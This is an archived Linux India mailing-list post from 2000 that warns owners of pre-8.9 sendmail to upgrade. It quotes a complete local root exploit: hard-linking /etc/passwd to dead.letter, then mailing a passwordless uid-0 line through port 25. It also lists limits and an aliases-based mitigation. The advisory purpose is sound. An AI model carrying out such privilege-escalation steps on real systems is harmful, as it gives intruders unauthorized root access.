[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]

[LI] root access from old sendmail boxes

To: Linux India <linux-india@xxxxxxxxxxxxxxxxxxxxx>
Subject: [LI] root access from old sendmail boxes
From: Suresh Ramasubramanian <r.suresh@xxxxxxxxxxxxxxx>
Date: Tue, 18 Jan 2000 21:41:01 +0530 (IST)
Reply-to: linux-india
Sender: owner-linux-india@xxxxxxxxxxxxxxxxxxxxx

Hi

To those of you with old sendmail boxes (pre 8.9) here's something which
shd send chills down your spine.  Upgrade to 8.9.3 asap.

from http://www.rootshells.com

Try this:

Make hard link of /etc/passwd to /var/tmp/dead.letter

Telnet to port 25, send mail from some bad email address to some
unreacheable host.

Watch your message get appended to passwd.
ie:
cowzilla::0:0:c0wz1ll4 0wns u:/:/bin/sh

This is not good.  Worked with my 8.8.4, will probably also work with
8.8.5

Root for the whole family

==================================================================

okay, just want to point out some things about this exploit... this won't
work on big boxes that are partitioned cause you can only do a hard link
on the same file system.  another point is that any box that has a
'MAILER-DAEMON' defined will get any mail that gets sent there instead of
it saving it to /var/tmp/dead.letter, ie, make an /etc/aliases file that
defines a MAILER-DAEMON. for instance, i add these two to my /etc/aliases:

MAILER-DAEMON:gonzo
postmaster:gonzo

then you just type 'newaliases' and you're good to go. (postmaster is a
general good idea) course then you have to deal with ppl's messed up
mail...


===================================================================

Here's a nice little sendmail exploit that works with 8.8.4 and maybe with
8.8.5. You need to have an account on the system you're exploiting. telnet
to your shell and issue following commands:

ln /etc/passwd /var/tmp/dead.letter
telnet target.host 25
mail from: non@xxxxxxxxxxxxx
rcpt to: non@xxxxxxxxxxxxx
data
kRad::0:0:J0oR dEaD:/root:/bin/bash
.
quit

The body of the message will be written into /etc/passwd and you've got a
password-free root account.

Note that this will NOT work under any of the following circumstances:

1. /var and / are different partitions.
        You can't make a hardlink between different partitions.

2. There is a postmaster account or mail alias.
        Mail problems are sent to postmaster before they go to
        /var/tmp/dead.letter.   

3. /var/tmp doesn't exist or isn't publicly writable.
        Duh.

4. Other situations?


-- 
Suresh Ramasubramanian     | President, CAUCE India
r.suresh@xxxxxxxxxxxxxxx   | suresh@xxxxxxxxxxxxxxx
http://www.india.cauce.org | Stopping Spam In India

--
Real programmers don't write in BASIC.  Actually, no programmers write in
BASIC after reaching puberty.

--------------------------------------------------------------------
The Linux India Mailing List Archives are now available.  Please search
the archive at http://lists.linux-india.org/ before posting your question
to avoid repetition and save bandwidth.

Follow-Ups:
- Re: [LI] root access from old sendmail boxes
  - From: Sathya Rangaswamy

Prev by Subject: [LI] Riva TNT2
Next by Subject: Re: [LI] root access from old sendmail boxes
Previous by thread: [LI] Re: Adduser
Next by thread: Re: [LI] root access from old sendmail boxes
Index(es):
- Subject
- Thread